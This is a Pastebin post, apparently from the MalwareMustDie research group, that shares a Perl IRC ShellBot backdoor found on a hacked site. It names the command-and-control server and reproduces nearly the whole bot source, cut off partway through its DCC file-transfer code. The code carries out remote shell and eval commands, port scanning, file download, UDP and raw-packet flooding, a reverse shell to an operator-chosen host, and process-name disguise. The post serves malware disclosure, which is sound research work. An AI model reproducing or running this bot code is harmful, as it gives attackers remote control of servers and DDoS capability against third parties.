SHARE
TWEET

Hacked Site with the US IRC Server'S Perl ShellBot

MalwareMustDie Feb 12th, 2014 1,260 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie!!
  2. # Found this evil Perl IRC Shell/Backdoor announced in:
  3. # https://twitter.com/unixfreaxjp/status/433629833889714176
  4. # CnC is IRC server in 74.208.250.181 is in USA network: u17072928.onlinehome-server.com.|8560 |
  5. # 74.208.0.0/16 | ONEANDONE | US | ONEANDONE.NET | 1&1 INTERNET INC.
  6. #
  7. # PoC of the malicious activity is snipped code below..
  8. # Detected: Backdoors, Faking many IRC Clients, HTTP downloader, Port Scanner and DDoS tools
  9. #
  10. # --- snips / start evidence ----
  11.  
  12. $ curl http://121.119.182.119/icons/web.is
  13.  
  14. #!/usr/bin/perl
  15. my @mast3rs = ("w","R");
  16.  
  17. my @hostauth = ("w");
  18. my @admchan=("#bug");
  19.  
  20. my @server = ("74.208.250.181");
  21. $servidor= $server[rand scalar @server] unless $servidor;
  22.  
  23.  
  24. my $xeqt = "!";
  25. my $homedir = "/tmp";
  26. my $shellaccess = 1;
  27. my $xstats = 1;
  28. my $pacotes = 1;
  29. my $linas_max = 5;
  30. my $sleep = 6;
  31. my $portime = 4;
  32.  
  33. my @fakeps = ("ps x");
  34.  
  35. my @nickname = ("LINUX");
  36.  
  37. my @xident = ("KAST");
  38. my @xname = (`uname -a`);
  39.  
  40. #################
  41. # Random Ports
  42. #################
  43. my @rports = ("6667");
  44.  
  45. my @Mrx = ("¥001mIRC32 v5.91 K.Mardam-Bey¥001","¥001mIRC v6.2 Khaled Mardam-Bey¥001",
  46.    "¥001mIRC v6.03 Khaled Mardam-Bey¥001","¥001mIRC v6.14 Khaled Mardam-Bey¥001",
  47.    "¥001mIRC v6.15 Khaled Mardam-Bey¥001","¥001mIRC v6.16 Khaled Mardam-Bey¥001",
  48.    "¥001mIRC v6.17 Khaled Mardam-Bey¥001","¥001mIRC v6.21 Khaled Mardam-Bey¥001",
  49.    "¥001Snak for Macintosh 4.9.8 English¥001",
  50.    "¥001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC¥001",
  51.    "¥001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)¥001",
  52.    "¥001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]¥001",
  53.    "¥001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]¥001",
  54.    "¥001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]¥001",
  55.    "¥001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]¥001",
  56.    "¥001ircN 7.27 + 7.0 - -¥001","¥001..(argon/1g) :bitchx-1.0c17¥001",
  57.    "¥001ircN 8.00 - he tries to tell me what I put inside of me -¥001",
  58.    "¥001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people¥001",
  59.    "¥001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!¥001",
  60.    "¥001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!¥001",
  61.    "¥001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!¥001",
  62.    "¥001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!¥001",
  63.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!¥001",
  64.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!¥001",
  65.    "¥001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!¥001",
  66.    "¥001bitchx-1.0c18 :tunnelvision/1.2¥001","¥001PnP 4.22 - http://www.pairc.com/¥001",
  67.    "¥001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1ツ?9] : Keep it to yourself!¥001",
  68.    "¥001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras¥001",
  69.    "¥001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet¥001",
  70.    "¥001irssi v0.8.10 - running on Linux i586¥001","¥001irssi v0.8.10 - running on FreeBSD i386¥001",
  71.    "¥001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there¥001",
  72.    "¥001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there¥001");
  73.  
  74. # Default quick scan ports
  75. my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
  76.  
  77. # xeQt
  78.  
  79. #my $nick = "Power";
  80. my $nick = $nickname[rand scalar @nickname];
  81. my $realname = $xname[rand scalar @xname];
  82. my $ircname = $xident[rand scalar @xident];
  83. my $porta = $rports[rand scalar @rports];
  84. my $xproc = $fakeps[rand scalar @fakeps];
  85. my $Mrx = $Mrx[rand scalar @Mrx];
  86. my $version = 'PowerBots (C) GohacK';
  87.  
  88. $SIG{'INT'} = 'IGNORE';
  89. $SIG{'HUP'} = 'IGNORE';
  90. $SIG{'TERM'} = 'IGNORE';
  91. $SIG{'CHLD'} = 'IGNORE';
  92. $SIG{'PS'} = 'IGNORE';
  93.  
  94.  
  95. use IO::Socket;
  96. use Socket;
  97. use IO::Select;
  98. chdir("$homedir");
  99. $servidor="$ARGV[0]" if $ARGV[0];
  100. $0="$xproc"."¥0";
  101. my $pid = fork;
  102. exit if $pid;
  103. die "[x] -> Cannot fork into background: $!" unless defined($pid);
  104. my %irc_servers;
  105. my %DCC;
  106. my $dcc_sel = new IO::Select->new();
  107.  
  108. sub getnick {
  109.   return "$nickname[rand scalar @nickname]".int(rand(20000));
  110. }
  111.  
  112. sub getstore ($$)
  113. {
  114.   my $url = shift;
  115.   my $file = shift;
  116.  
  117.   $http_stream_out = 1;
  118.   open(GET_OUTFILE, "> $file");
  119.   %http_loop_check = ();
  120.   _get($url);
  121.   close GET_OUTFILE;
  122.   return $main::http_get_result;
  123. }
  124. sub _get
  125. {
  126.   my $url = shift;
  127.   my $proxy = "";
  128.   grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
  129.   if (($proxy eq "") && $url =m,^http://([^/:]+)(?::(¥d+))?(/¥S*)?$,) {
  130.     my $host = $1;
  131.     my $port = $2 || 80;
  132.     my $path = $3;
  133.     $path = "/" unless defined($path);
  134.     return _trivial_http_get($host, $port, $path);
  135.   } elsif ($proxy =m,^http://([^/:]+):(¥d+)(/¥S*)?$,) {
  136.     my $host = $1;
  137.     my $port = $2;
  138.     my $path = $url;
  139.     return _trivial_http_get($host, $port, $path);
  140.   } else {
  141.     return undef;
  142.   }
  143. }
  144. sub _trivial_http_get
  145. {
  146.   my($host, $port, $path) = @_;
  147.   my($AGENT, $VERSION, $p);
  148.   #print "HOST=$host, PORT=$port, PATH=$path¥n";
  149.  
  150.   $AGENT = "get-minimal";
  151.   $VERSION = "20000118";
  152.  
  153.   $path =s/ /%20/g;
  154.  
  155.   require IO::Socket;
  156.   local($^W) = 0;
  157.   my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto   => 'tcp', Timeout  => 60) || return;
  158.  
  159.   $sock->autoflush;
  160.   my $netloc = $host;
  161.   $netloc .= ":$port" if $port != 80;
  162.   my $request = "GET $path HTTP/1.0¥015¥012"
  163.               . "Host: $netloc¥015¥012"
  164.               . "User-Agent: $AGENT/$VERSION/u¥015¥012";
  165.   $request .= "Pragma: no-cache¥015¥012" if ($main::http_no_cache);
  166.   $request .= "¥015¥012";
  167.   print $sock $request;
  168.   my $buf = "";
  169.   my $n;
  170.   my $b1 = "";
  171.   while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
  172.     if ($b1 eq "") {
  173.       $b1 = $buf;
  174.       $buf =s/.+?¥015?¥012¥015?¥012//s;
  175.     }
  176.     if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
  177.   }
  178.   return undef unless defined($n);
  179.   $main::http_get_result = 200;
  180.   if ($b1 =m,^HTTP/¥d+¥.¥d+¥s+(¥d+)[^¥012]*¥012,) {
  181.     $main::http_get_result = $1;
  182.     # print "CODE=$main::http_get_result¥n$b1¥n";
  183.     if ($main::http_get_result =/^30[1237]/ && $b1 =/¥012Location:¥s*(¥S+)/) {
  184.       my $url = $1;
  185.       return undef if $http_loop_check{$url}++;
  186.       return _get($url);
  187.     }
  188.     return undef unless $main::http_get_result =/^2/;
  189.   }
  190.   return $buf;
  191. }
  192. $sel_cliente = IO::Select->new();
  193. sub sendraw {
  194.   if ($#_ == '1') {
  195.     my $socket = $_[0];
  196.     print $socket "$_[1]¥n";
  197.   } else {
  198.       print $IRC_cur_socket "$_[0]¥n";
  199.   }
  200. }
  201. sub conectar {
  202.    my $meunick = $_[0];
  203.    my $servidor_con = $_[1];
  204.    my $porta_con = $_[2];
  205.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  206.    if (defined($IRC_socket)) {
  207.      $IRC_cur_socket = $IRC_socket;
  208.      $IRC_socket->autoflush(1);
  209.      $sel_cliente->add($IRC_socket);
  210.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  211.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  212.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  213.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  214.      nick("$meunick");
  215.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  216.      sleep 2;
  217.    }
  218. }
  219. my $line_temp;
  220. while( 1 ) {
  221.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  222.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  223.    &DCC::connections;
  224.    my @ready = $sel_cliente->can_read(0.6);
  225.    next unless(@ready);
  226.    foreach $fh (@ready) {
  227.      $IRC_cur_socket = $fh;
  228.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  229.      $nread = sysread($fh, $msg, 4096);
  230.      if ($nread == 0) {
  231.         $sel_cliente->remove($fh);
  232.         $fh->close;
  233.         delete($irc_servers{$fh});
  234.      }
  235.      @lines = split (/¥n/, $msg);
  236.      for(my $c=0; $c<= $#lines; $c++) {
  237.        $line = $lines[$c];
  238.        $line=$line_temp.$line if ($line_temp);
  239.        $line_temp='';
  240.        $line =s/¥r$//;
  241.        unless ($c == $#lines) {
  242.          parse("$line");
  243.        } else {
  244.            if ($#lines == 0) {
  245.              parse("$line");
  246.            } elsif ($lines[$c] =/¥r$/) {
  247.                parse("$line");
  248.            } elsif ($line =/^(¥S+) NOTICE AUTH :¥*¥*¥*/) {
  249.                parse("$line");
  250.            } else {
  251.                $line_temp = $line;
  252.            }
  253.        }
  254.       }
  255.    }
  256. }
  257.  
  258. sub parse {
  259.    my $servarg = shift;
  260.    if ($servarg =/^PING ¥:(.*)/) {
  261.      sendraw("PONG :$1");
  262.    } elsif ($servarg =/^¥:(.+?)¥!(.+?)¥@(.+?) PRIVMSG (.+?) ¥:(.+)/) {
  263.        my $pn=$1; my $hostnam3=$3; my $onde = $4; my $args = $5;
  264.        if ($args =/^¥001VERSION¥001$/) {
  265.          notice("$pn", "".$Mrx."");
  266.        }
  267.        elsif ($args =/^¥001PING¥s+(¥d+)¥001$/) {
  268.          notice("$pn", "¥001PONG¥001");
  269.        }
  270.        if (grep {$_ =/^¥Q$hostnam3¥E$/i } @hostauth) {
  271.        if (grep {$_ =/^¥Q$pn¥E$/i } @mast3rs) {
  272.          if ($onde eq "$meunick"){
  273.            shell("$pn", "$args");
  274.         }
  275.     if ($args =/^!(.*)/){
  276.        ircase("$pn","$chan","$1");
  277.     }
  278.         if ($args =/^(¥Q$meunick¥E|¥Q$xeqt¥E)¥s+(.*)/ ) {
  279.             my $natrix = $1;
  280.             my $arg = $2;
  281.             if ($arg =/^¥!(.*)/) {
  282.               ircase("$pn","$onde","$1");
  283.             } elsif ($arg =/^¥@(.*)/) {
  284.                 $ondep = $onde;
  285.                 $ondep = $pn if $onde eq $meunick;
  286.                 bfunc("$ondep","$1");
  287.             } else {
  288.                 shell("$onde", "$arg");
  289.             }
  290.           }
  291.         }
  292.       }
  293.    } elsif ($servarg =/^¥:(.+?)¥!(.+?)¥@(.+?)¥s+NICK¥s+¥:(¥S+)/i) {
  294.        if (lc($1) eq lc($meunick)) {
  295.          $meunick=$4;
  296.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  297.        }
  298.    } elsif ($servarg =m/^¥:(.+?)¥s+433/i) {
  299.        $meunick = getnick();
  300.        nick("".$meunick."-");
  301.    } elsif ($servarg =m/^¥:(.+?)¥s+001¥s+(¥S+)¥s/i) {
  302.        $meunick = $2;
  303.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  304.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  305.        foreach my $canal (@admchan){
  306.          sendraw("JOIN $canal muietie");
  307.        }
  308.    }
  309. }
  310. sub bfunc {
  311.   my $printl = $_[0];
  312.   my $funcarg = $_[1];
  313.   if (my $pid = fork) {
  314.      waitpid($pid, 0);
  315.   } else {
  316.       if (fork)
  317.        {
  318.          exit;
  319.        }
  320.    else
  321.    {
  322.       # Quick scan
  323.            if ($funcarg =/^ps (.*)/) {
  324.              my $hostip="$1";
  325.         sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312Portscanning¥003¥002: $1 ¥002¥00312Ports:¥003¥002 default");
  326.              my (@aberta, %porta_banner);
  327.              foreach my $porta (@portas)  {
  328.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  329.                 if ($scansock) {
  330.                    push (@aberta, $porta);
  331.                    $scansock->close;
  332.          sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
  333.                 }
  334.              }
  335.              if (@aberta) {
  336.                sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
  337.              } else {
  338.                  sendraw($IRC_cur_socket,"PRIVMSG $printl :¥002[x]¥0034 No open ports found on¥002 $1");
  339.              }
  340.            }
  341.       # NMAP, lol
  342.            elsif ($funcarg =/^nmap¥s+(.*)¥s+(¥d+)¥s+(¥d+)/)
  343.       {
  344.               my $hostname="$1";
  345.               my $portstart = "$2";
  346.                my $portend = "$3";
  347.                my (@abertas, %porta_banner);
  348.           sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312xMap Portscanning¥003¥002: $1 ¥002¥00312Ports:¥003¥002 $2-$3");
  349.                foreach my $porta ($portstart..$portend)
  350.              {
  351.                my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
  352.                if ($scansock) {
  353.                  push (@abertas, $porta);
  354.                  $scansock->close;
  355.                  if ($xstats)
  356.        {
  357.                    sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
  358.                  }
  359.                }
  360.              }
  361.              if (@abertas) {
  362.           sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312Scan Complate¥003¥002");
  363.              } else {
  364.                sendraw($IRC_cur_socket,"PRIVMSG $printl :¥002¥00312No ports found..¥002");
  365.              }
  366.             }
  367.       # Remove
  368.       elsif ($funcarg =/^rm/)
  369.       {
  370.          system("cd /var/tmp ; rm -rf cb find god* wunder* udev* lib*");
  371.       sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Quickdel)¥002¥00314 Removed files and folders ");
  372.       }
  373.       # Version
  374.       elsif ($funcarg =/^version/)
  375.       {
  376.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Version)¥002¥00314 $version ");
  377.       }
  378.       # Download
  379.            elsif ($funcarg =/^down¥s+(.*)¥s+(.*)/)
  380.       {
  381.               getstore("$1", "$2");
  382.               sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(Download)¥002¥00314 Page: $2 (File: $1)") if ($xstats);
  383.            }
  384.        # Udp
  385.             elsif ($funcarg =/^udp¥s+(.*)¥s+(¥d+)¥s+(¥d+)/) {
  386.               return unless $pacotes;
  387.               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
  388.               my $alvo=inet_aton("$1");
  389.               my $porta = "$2";
  390.               my $tempo = "$3";
  391.               my $pacote;
  392.               my $pacotese;
  393.               my $fim = time + $tempo;
  394.               my $pacota = 1;
  395.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(UDP DDoSing)¥003 Attacking¥002: $1 - ¥002Time¥002: $tempo"."seconds");
  396.               while (($pacota == "1") && ($pacotes == "1")) {
  397.                 $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
  398.                 $pacote=$rand x $rand x $rand;
  399.                 $porta = int(rand 65000) +1 if ($porta == "0");
  400.                 send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
  401.               }
  402.               if ($xstats)
  403.               {
  404.                sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002¥00312(UDP Complete):¥003¥002 $1 - ¥002Sendt¥002: $pacotese"."kb - ¥002Time¥002: $tempo"."seconds");
  405.              }
  406.             }
  407.  
  408.        # Backconnect
  409.             elsif ($funcarg =/^back¥s+(.*)¥s+(¥d+)/) {
  410.               my $host = "$1";
  411.               my $porta = "$2";
  412.               my $proto = getprotobyname('tcp');
  413.               my $iaddr = inet_aton($host);
  414.               my $paddr = sockaddr_in($porta, $iaddr);
  415.               my $shell = "/bin/sh -i";
  416.               if ($^O eq "MSWin32") {
  417.                 $shell = "cmd.exe";
  418.               }
  419.               socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  420.               connect(SOCKET, $paddr) or die "connect: $!";
  421.          sendraw($IRC_cur_socket, "PRIVMSG $printl :¥002[x] ->¥0034 Injection ...");
  422.               open(STDIN, ">&SOCKET");
  423.               open(STDOUT, ">&SOCKET");
  424.               open(STDERR, ">&SOCKET");
  425.               system("$shell");
  426.          system("cd /tmp/.mrx");
  427.               close(STDIN);
  428.               close(STDOUT);
  429.               close(STDERR);
  430.             }
  431.            exit;
  432.        }
  433.   }
  434. }
  435.  
  436. sub ircase {
  437.   my ($kem, $printl, $case) = @_;
  438.  
  439.    if ($case =/^join (.*)/) {
  440.      j("$1");
  441.    }
  442.    elsif ($case =/^part (.*)/) {
  443.       p("$1");
  444.    }
  445.    elsif ($case =/^rejoin¥s+(.*)/) {
  446.       my $chan = $1;
  447.       if ($chan =/^(¥d+) (.*)/) {
  448.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  449.           p("$2");
  450.           j("$2");
  451.         }
  452.       } else {
  453.           p("$chan");
  454.           j("$chan");
  455.       }
  456.    }
  457.    elsif ($case =/^op/) {
  458.       op("$printl", "$kem") if $case eq "op";
  459.       my $oarg = substr($case, 3);
  460.       op("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  461.    }
  462.    elsif ($case =/^deop/) {
  463.       deop("$printl", "$kem") if $case eq "deop";
  464.       my $oarg = substr($case, 5);
  465.       deop("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  466.    }
  467.    elsif ($case =/^voice/) {
  468.       voice("$printl", "$kem") if $case eq "voice";
  469.       $oarg = substr($case, 6);
  470.       voice("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  471.    }
  472.    elsif ($case =/^devoice/) {
  473.       devoice("$printl", "$kem") if $case eq "devoice";
  474.       $oarg = substr($case, 8);
  475.       devoice("$1", "$2") if ($oarg =/(¥S+)¥s+(¥S+)/);
  476.    }
  477.    elsif ($case =/^msg¥s+(¥S+) (.*)/) {
  478.       msg("$1", "$2");
  479.    }
  480.    elsif ($case =/^flood¥s+(¥d+)¥s+(¥S+) (.*)/) {
  481.       for (my $cf = 1; $cf <= $1; $cf++) {
  482.         msg("$2", "$3");
  483.       }
  484.    }
  485.    elsif ($case =/^ctcpflood¥s+(¥d+)¥s+(¥S+) (.*)/) {
  486.       for (my $cf = 1; $cf <= $1; $cf++) {
  487.         ctcp("$2", "$3");
  488.       }
  489.    }
  490.    elsif ($case =/^ctcp¥s+(¥S+) (.*)/) {
  491.       ctcp("$1", "$2");
  492.    }
  493.    elsif ($case =/^invite¥s+(¥S+) (.*)/) {
  494.       invite("$1", "$2");
  495.    }
  496.    elsif ($case =/^nick (.*)/) {
  497.       nick("$1");
  498.    }
  499.    elsif ($case =/^jump¥s+(¥S+)¥s+(¥S+)/) {
  500.        conectar("$2", "$1", 6667);
  501.    }
  502.    elsif ($case =/^send¥s+(¥S+)¥s+(¥S+)/) {
  503.       DCC::SEND("$1", "$2");
  504.    }
  505.    elsif ($case =/^raw (.*)/) {
  506.       sendraw("$1");
  507.    }
  508.    elsif ($case =/^eval (.*)/) {
  509.       eval "$1";
  510.    }
  511.    elsif ($case =/^rj¥s+(¥S+)¥s+(¥d+)/) {
  512.     sleep int(rand($2));
  513.     j("$1");
  514.    }
  515.    elsif ($case =/^rp¥s+(¥S+)¥s+(¥d+)/) {
  516.     sleep int(rand($2));
  517.     p("$1");
  518.    }
  519.    elsif ($case =/^quit/) {
  520.      quit();
  521.    }
  522.    elsif ($case =/^rand/) {
  523.     my $novonick = getnick();
  524.      nick("$novonick");
  525.    }
  526.    elsif ($case =/^stat (.*)/) {
  527.      if ($1 eq "on") {
  528.       $xstats = 1;
  529.       msg("$printl", "Satus enabled");
  530.      } elsif ($1 eq "off") {
  531.       $xstats = 0;
  532.       msg("$printl", "Status disable");
  533.      }
  534.    }
  535.    elsif ($case =/^bang (.*)/) {
  536.      if ($1 eq "on") {
  537.       $pacotes = 1;
  538.       msg("$printl", "[x] Bang mode enabled") if ($xstats == "1");
  539.      } elsif ($1 eq "off") {
  540.       $pacotes = 0;
  541.       msg("$printl", "[x] Bang mode disabled") if ($xstats == "1");
  542.      }
  543.    }
  544. }
  545. sub shell {
  546.   return unless $shellaccess;
  547.   my $printl=$_[0];
  548.   my $comando=$_[1];
  549.   if ($comando =/cd (.*)/) {
  550.     chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
  551.     return;
  552.   }
  553.   elsif ($pid = fork) {
  554.      waitpid($pid, 0);
  555.   } else {
  556.       if (fork) {
  557.          exit;
  558.        } else {
  559.            my @resp=`$comando 2>&1 3>&1`;
  560.            my $c=0;
  561.            foreach my $linha (@resp) {
  562.              $c++;
  563.              chop $linha;
  564.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  565.              if ($c >= "$linas_max") {
  566.                $c=0;
  567.                sleep $sleep;
  568.              }
  569.            }
  570.            exit;
  571.        }
  572.   }
  573. }
  574.  
  575. sub attacker {
  576.   my $iaddr = inet_aton($_[0]);
  577.   my $msg = 'B' x $_[1];
  578.   my $ftime = $_[2];
  579.   my $cp = 0;
  580.   my (%pacotes);
  581.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  582.  
  583.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  584.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  585.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  586.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  587.   return(undef) if $cp == 4;
  588.   my $itime = time;
  589.   my ($cur_time);
  590.   while ( 1 ) {
  591.      for (my $porta = 1; $porta <= 65535; $porta++) {
  592.        $cur_time = time - $itime;
  593.        last if $cur_time >= $ftime;
  594.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
  595.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
  596.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
  597.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
  598.        for (my $pc = 3; $pc <= 255;$pc++) {
  599.          next if $pc == 6;
  600.          $cur_time = time - $itime;
  601.          last if $cur_time >= $ftime;
  602.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  603.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
  604.        }
  605.      }
  606.      last if $cur_time >= $ftime;
  607.   }
  608.   return($cur_time, %pacotes);
  609. }
  610.  
  611. sub action {
  612.    return unless $#_ == 1;
  613.    sendraw("PRIVMSG $_[0] :¥001ACTION $_[1]¥001");
  614. }
  615. sub ctcp {
  616.    return unless $#_ == 1;
  617.    sendraw("PRIVMSG $_[0] :¥001$_[1]¥001");
  618. }
  619. sub msg {
  620.    return unless $#_ == 1;
  621.    sendraw("PRIVMSG $_[0] :$_[1]");
  622. }
  623. sub notice {
  624.    return unless $#_ == 1;
  625.    sendraw("NOTICE $_[0] :$_[1]");
  626. }
  627. sub op {
  628.    return unless $#_ == 1;
  629.    sendraw("MODE $_[0] +o $_[1]");
  630. }
  631. sub deop {
  632.    return unless $#_ == 1;
  633.    sendraw("MODE $_[0] -o $_[1]");
  634. }
  635. sub hop {
  636.     return unless $#_ == 1;
  637.    sendraw("MODE $_[0] +h $_[1]");
  638. }
  639. sub dehop {
  640.    return unless $#_ == 1;
  641.    sendraw("MODE $_[0] +h $_[1]");
  642. }
  643. sub voice {
  644.    return unless $#_ == 1;
  645.    sendraw("MODE $_[0] +v $_[1]");
  646. }
  647. sub devoice {
  648.    return unless $#_ == 1;
  649.    sendraw("MODE $_[0] -v $_[1]");
  650. }
  651. sub ban {
  652.    return unless $#_ == 1;
  653.    sendraw("MODE $_[0] +b $_[1]");
  654. }
  655. sub unban {
  656.    return unless $#_ == 1;
  657.    sendraw("MODE $_[0] -b $_[1]");
  658. }
  659. sub kick {
  660.    return unless $#_ == 1;
  661.    sendraw("KICK $_[0] $_[1] :$_[2]");
  662. }
  663. sub modo {
  664.    return unless $#_ == 0;
  665.    sendraw("MODE $_[0] $_[1]");
  666. }
  667. sub mode { modo(@_); }
  668. sub j { &join(@_); }
  669. sub join {
  670.    return unless $#_ == 0;
  671.    sendraw("JOIN $_[0]");
  672. }
  673. sub p { part(@_); }
  674. sub part {sendraw("PART $_[0]");}
  675. sub nick {
  676.   return unless $#_ == 0;
  677.   sendraw("NICK $_[0]");
  678. }
  679. sub invite {
  680.    return unless $#_ == 1;
  681.    sendraw("INVITE $_[1] $_[0]");
  682. }
  683. sub topico {
  684.    return unless $#_ == 1;
  685.    sendraw("TOPIC $_[0] $_[1]");
  686. }
  687. sub topic { topico(@_); }
  688. sub whois {
  689.   return unless $#_ == 0;
  690.   sendraw("WHOIS $_[0]");
  691. }
  692. sub who {
  693.   return unless $#_ == 0;
  694.   sendraw("WHO $_[0]");
  695. }
  696. sub names {
  697.   return unless $#_ == 0;
  698.   sendraw("NAMES $_[0]");
  699. }
  700. sub away {
  701.   sendraw("AWAY $_[0]");
  702. }
  703. sub back { away(); }
  704. sub quit {
  705.   sendraw("QUIT :$_[0]");
  706.   exit;
  707. }
  708.  
  709. package DCC;
  710. sub connections {
  711.    my @ready = $dcc_sel->can_read(1);
  712. #   return unless (@ready);
  713.    foreach my $fh (@ready) {
  714.      my $dcctipo = $DCC{$fh}{tipo};
  715.      my $arquivo = $DCC{$fh}{arquivo};
  716.      my $bytes = $DCC{$fh}{bytes};
  717.      my $cur_byte = $DCC{$fh}{curbyte};
  718.      my $nick = $DCC{$fh}{nick};
  719.      my $msg;
  720.      my $nread = sysread($fh, $msg, 10240);
  721.      if ($nread == 0 and $dcctipo =/^(get|sendcon)$/) {
  722.         $DCC{$fh}{status} = "Cancelado";
  723.         $DCC{$fh}{ftime} = time;
  724.         $dcc_sel->remove($fh);
  725.         $fh->close;
  726.         next;
  727.      }
  728.      if ($dcctipo eq "get") {
  729.         $DCC{$fh}{curbyte} += length($msg);
  730.  
  731.         my $cur_byte = $DCC{$fh}{curbyte};
  732.  
  733.         open(FILE, ">> $arquivo");
  734.         print FILE "$msg" if ($cur_byte <= $bytes);
  735.         close(FILE);
  736.  
  737.         my $packbyte = pack("N", $cur_byte);
  738.         print $fh "$packbyte";
  739.  
  740.         if ($bytes == $cur_byte) {
  741.            $dcc_sel->remove($fh);
  742.            $fh->close;
  743.            $DCC{$fh}{status} = "Recebido";
  744.            $DCC{$fh}{ftime} = time;
  745.            next;
  746.         }
  747.      } elsif ($dcctipo eq "send") {
  748.           my $send = $fh->accept;
  749.           $send->autoflush(1);
  750.           $dcc_sel->add($send);
  751.           $dcc_sel->remove($fh);
  752.           $DCC{$send}{tipo} = 'sendcon';
  753.           $DCC{$send}{itime} = time;
  754.           $DCC{$send}{nick} = $nick;
  755.           $DCC{$send}{bytes} = $bytes;
  756.           $DCC{$send}{curbyte} = 0;
  757.           $DCC{$send}{arquivo} = $arquivo;
  758.           $DCC{$send}{ip} = $send->peerhost;
  759.           $DCC{$send}{porta} = $send->peerport;
  760.           $DCC{$send}{status} = "Enviando";
  761.           open(FILE, "< $arquivo");
  762.           my $fbytes;
  763.           read(FILE, $fbytes, 1024);
  764.           print $send "$fbytes";
  765.           close FILE;
  766. #          delete($DCC{$fh});
  767.      } elsif ($dcctipo eq 'sendcon') {
  768.           my $bytes_sended = unpack("N", $msg);
